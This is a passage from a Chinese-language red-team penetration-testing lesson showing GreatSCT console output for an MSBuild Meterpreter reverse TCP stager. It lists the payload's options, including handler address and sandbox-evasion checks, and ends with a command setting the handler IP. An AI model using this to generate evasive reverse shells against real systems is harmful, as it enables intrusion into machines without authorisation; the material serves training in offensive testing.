工具介绍:

    第十八课:红蓝对抗渗透测试3 - 图1

    1. Great Scott!
    2. ===========================================================================
    3. [Web]: https://github.com/GreatSCT/GreatSCT | [Twitter]: @ConsciousHacker
    4. ===========================================================================
    5. Payload information:
    6. Name: Pure MSBuild C# Reverse TCP Stager
    7. Language: msbuild
    8. Rating: Excellent
    9. Description: pure windows/meterpreter/reverse_tcp stager, no
    10. shellcode
    11. Required Options:
    12. Name Value Description
    13. ‐‐‐‐ ‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐
    14. DOMAIN X Optional: Required internal domain
    15. EXPIRE_PAYLOAD X Optional: Payloads expire after "Y" days
    16. HOSTNAME X Optional: Required system hostname
    17. INJECT_METHOD Virtual Virtual or Heap
    18. LHOST IP of the Metasploit handler
    19. LPORT 4444 Port of the Metasploit handler
    20. PROCESSORS X Optional: Minimum number of processors
    21. USERNAME X Optional: The required user account
    22. Available Commands:
    23. back Go back
    24. exit Completely exit GreatSCT
    25. generate Generate the payload
    26. options Show the shellcode's options
    27. set Set shellcode option
    28. [msbuild/meterpreter/rev_tcp>>] set LHOST 192.168.1.4 41